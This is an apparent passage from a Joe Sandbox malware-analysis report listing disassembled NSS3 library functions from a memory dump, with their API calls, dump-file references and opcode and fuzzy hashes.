                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,6BF2952D), ref: 6BF27BE7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Arena$Alloc_$Error$FindHashLookupTable$ConstCopyCurrentGrow_Item_Tag_Threadstrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 915756558-0
                                                                                                                                                                                                                                                            • Opcode ID: 9c569a9f203f87ff574882c269cc7d2df6116064ee480c1aa46b74f4135963de
                                                                                                                                                                                                                                                            • Instruction ID: 9116faaabd17d48948dc0902f45c88127a6480f6a820c03776679ba1efaad3d9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c569a9f203f87ff574882c269cc7d2df6116064ee480c1aa46b74f4135963de
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09518F76A003029FE7108FA9DC91B22B7F1BF45344F1445ACD8198B2B6E779ED54CB90
                                                                                                                                                                                                                                                            Function 6BEC38E0 Relevance: 18.1, APIs: 12, Instructions: 83COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,?,?,6BEC38A8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BEC38FF
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6BEC38A8), ref: 6BEC3918
                                                                                                                                                                                                                                                            • PL_HashTableDestroy.NSS3(?,?,?,?,?,6BEC38A8), ref: 6BEC392C
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6BEC38A8), ref: 6BEC3941
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6BEC38A8), ref: 6BEC3952
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,6BEC38A8), ref: 6BEC395E
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,?,?,6BEC38A8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BEC3981
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6BEC38A8), ref: 6BEC3996
                                                                                                                                                                                                                                                            • PL_HashTableDestroy.NSS3(?,?,?,?,?,6BEC38A8), ref: 6BEC39AA
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6BEC38A8), ref: 6BEC39BF
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6BEC38A8), ref: 6BEC39D0
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,6BEC38A8), ref: 6BEC39DC
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$DeleteDestroyEnterHashTableUnlockValuefree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2967110932-0
                                                                                                                                                                                                                                                            • Opcode ID: f91ed25927b552b1d69d37bda095404d13a5714a9ea643dce9598e4fd50fffd4
                                                                                                                                                                                                                                                            • Instruction ID: 38eb6e397b172ad3652261a4269abdad6f8b3809f0ff6ab490ddb723ea90f3aa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f91ed25927b552b1d69d37bda095404d13a5714a9ea643dce9598e4fd50fffd4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3313AB5A54602CBCB10BFB8C289559FBF4FB06318F214929D89593A01EF38E495CB82
                                                                                                                                                                                                                                                            Function 6BECE910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(?,http://,00000007), ref: 6BECE93B
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE075,00000000), ref: 6BECE94E
                                                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000001), ref: 6BECE995
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BECE9A7
                                                                                                                                                                                                                                                            • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6BECE9CA
                                                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(6C00933E), ref: 6BECEA17
                                                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000001), ref: 6BECEA28
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20BE0: malloc.MOZGLUE(6BF18D2D,?,00000000,?), ref: 6BF20BF8
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20BE0: TlsGetValue.KERNEL32(6BF18D2D,?,00000000,?), ref: 6BF20C15
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BECEA3C
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BECEA69
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
                                                                                                                                                                                                                                                            • String ID: http://
                                                                                                                                                                                                                                                            • API String ID: 3982757857-1121587658
                                                                                                                                                                                                                                                            • Opcode ID: 69392c603885b73824981581b6e72c238703c5792911799965aafa8e4bfb76bc
                                                                                                                                                                                                                                                            • Instruction ID: ef61e2f041e34b07e9a8688a03e9fc1bdb03aa2e01d2f16cec61e21c85f9841c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69392c603885b73824981581b6e72c238703c5792911799965aafa8e4bfb76bc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55419075D647068BEF604AB88D437AB77A5AB0630CF6000E1DCB897351E31DB563C2A7
                                                                                                                                                                                                                                                            Function 6BF46BA0 Relevance: 16.7, APIs: 11, Instructions: 248COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000159,?,?,?,?,?,?,?,6BF50293), ref: 6BF46BC2
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD016,00000000), ref: 6BF46C13
                                                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(?), ref: 6BF46C39
                                                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BF46C6C
                                                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000146,?), ref: 6BF46CAB
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD016,00000000), ref: 6BF46CEE
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD016,00000000), ref: 6BF46D2A
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD016,00000000), ref: 6BF46D6D
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD016,00000000), ref: 6BF46DBD
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD016,00000000), ref: 6BF46E13
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD016,00000000), ref: 6BF46EE9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$AlgorithmPolicy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 644051021-0
                                                                                                                                                                                                                                                            • Opcode ID: a13c64109db9eedcde8429f225509545f68d0b911aac2ff365068f520a0a421f
                                                                                                                                                                                                                                                            • Instruction ID: 4bd056721d0b5301006cd6c098568495cafa34da5816ae5db8691e2b61b65f3d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a13c64109db9eedcde8429f225509545f68d0b911aac2ff365068f520a0a421f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56911133D08285ABEF048AACCD517993BB19B5233CF1402E6F5926B2F3F37D95458256
                                                                                                                                                                                                                                                            Function 6BEE5B40 Relevance: 16.7, APIs: 11, Instructions: 200stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE041,00000000,6BF15419,00000000,00000000), ref: 6BEE5B59
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            • PR_NewLock.NSS3(?,?,6BF15419,00000000,00000000), ref: 6BEE5B96
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6BF15512,?,?,6BF15419,00000000,00000000), ref: 6BEE5C22
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,6BF15419,00000000,00000000), ref: 6BEE5C42
                                                                                                                                                                                                                                                            • PR_NewLock.NSS3(?,?,?,?,?,?,?,6BF15419,00000000,00000000), ref: 6BEE5C7E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Lock$ErrorValuememcpystrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2948281689-0
                                                                                                                                                                                                                                                            • Opcode ID: 343336f3c30b372165fee79f97387ddff4b53614d3eabb856a2490f7423fef61
                                                                                                                                                                                                                                                            • Instruction ID: 570f36c180e9eca9f920483cbb57d44761eee5f1141ba3da45b3f57f4e829af6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 343336f3c30b372165fee79f97387ddff4b53614d3eabb856a2490f7423fef61
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81717EB5E002169FDB00CF74D885A6BB7F8FF04318F2444A9E9199B311E779E916CBA1
                                                                                                                                                                                                                                                            Function 6BF0F9A0 Relevance: 16.7, APIs: 11, Instructions: 195stringmemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C), ref: 6BF0F9B9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20BE0: malloc.MOZGLUE(6BF18D2D,?,00000000,?), ref: 6BF20BF8
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20BE0: TlsGetValue.KERNEL32(6BF18D2D,?,00000000,?), ref: 6BF20C15
                                                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6BF0F9D2
                                                                                                                                                                                                                                                              • Part of subcall function 6BF898D0: calloc.MOZGLUE(00000001,00000084,6BEB0936,00000001,?,6BEB102C), ref: 6BF898E5
                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6BF0FA5A
                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6BF0FAA0
                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6BF0FABB
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF0FB02
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6BF0FB12
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE041,00000000), ref: 6BF0FB5F
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF0FB6F
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6BF0FB86
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6BF0FBE1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$strcmp$free$Alloc_LockUtilValuecallocmalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4237468566-0
                                                                                                                                                                                                                                                            • Opcode ID: ae7e082748ff8a65f8bc2a73eb06d87756a3a0d62a57c33632815c988605da08
                                                                                                                                                                                                                                                            • Instruction ID: 51b045ec60288d4dbd5ccd2c4ad1aed85175ec1eac7b89495507a0cd90d9d57b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae7e082748ff8a65f8bc2a73eb06d87756a3a0d62a57c33632815c988605da08
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6561D1B3E002139BEF809E649C61B6BB7A5AF10768F140168DC15A72B1EF7CE540EBD5
                                                                                                                                                                                                                                                            Function 6BF118D0 Relevance: 16.7, APIs: 11, Instructions: 169COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF11926
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BF1193F
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BF11962
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BF11996
                                                                                                                                                                                                                                                            • PK11_GetSlotInfo.NSS3 ref: 6BF119A5
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF119DC
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BF119F5
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BF11A2D
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF11A50
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BF11A69
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BF11ABC
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$Unlock$CriticalEnterSection$calloc$InfoK11_Slot
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3878197720-0
                                                                                                                                                                                                                                                            • Opcode ID: 5ceb9d2c5489d8c1d22ec78993f7bb35cac46e9a515885a42f76f40666332776
                                                                                                                                                                                                                                                            • Instruction ID: b4f0360d0df209569ecfc4b5fbabc07fc2cf961d5a14a1ac38cdcb8849aee841
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ceb9d2c5489d8c1d22ec78993f7bb35cac46e9a515885a42f76f40666332776
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4661AB76A08B11CFDB10AF78C18572AFBF0BF54314F51496DC89687660EB38E985CB81
                                                                                                                                                                                                                                                            Function 6BEC3A20 Relevance: 16.6, APIs: 11, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6BEC3A3C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6BEC9003,?), ref: 6BF1FD91
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FD80: PORT_Alloc_Util.NSS3(A4686BF2,?), ref: 6BF1FDA2
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686BF2,?,?), ref: 6BF1FDC4
                                                                                                                                                                                                                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000004), ref: 6BEC3A4C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1F9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6BEBF379,?,00000000,-00000002), ref: 6BF1F9B7
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEC3A7F
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BEC3A96
                                                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?), ref: 6BEC3AA9
                                                                                                                                                                                                                                                            • PL_HashTableRemove.NSS3(?), ref: 6BEC3ABC
                                                                                                                                                                                                                                                            • PL_HashTableAdd.NSS3(?,00000000), ref: 6BEC3ACF
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEC3ADF
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BEC3AFB
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BEC3B0A
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BEC3B19
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Item_$HashTable$Alloc_Zfree$AllocArenaCriticalEnterErrorLookupMark_RemoveSectionUnlockValuememcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3410065601-0
                                                                                                                                                                                                                                                            • Opcode ID: da277910444df4ae1e98a28119b3d0740438b27bb9b69782f7bf78434ae3c250
                                                                                                                                                                                                                                                            • Instruction ID: 8c954346b94a18200287a9a3019addbf4b924f0190c9f50e6071653f273cd761
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da277910444df4ae1e98a28119b3d0740438b27bb9b69782f7bf78434ae3c250
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72313A76E002016BDF115AB4AD86A6BB778EB0531CF204634ED2892311FB3ADD24C292
                                                                                                                                                                                                                                                            Function 6BFD2AD0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 46stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6BFD2AE8
                                                                                                                                                                                                                                                            • strdup.MOZGLUE(00000000), ref: 6BFD2AFA
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6BFD2B0B
                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LD_LIBRARY_PATH), ref: 6BFD2B1E
                                                                                                                                                                                                                                                            • strdup.MOZGLUE(.;\lib), ref: 6BFD2B32
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6BFD2B4A
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6BFD2B59
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
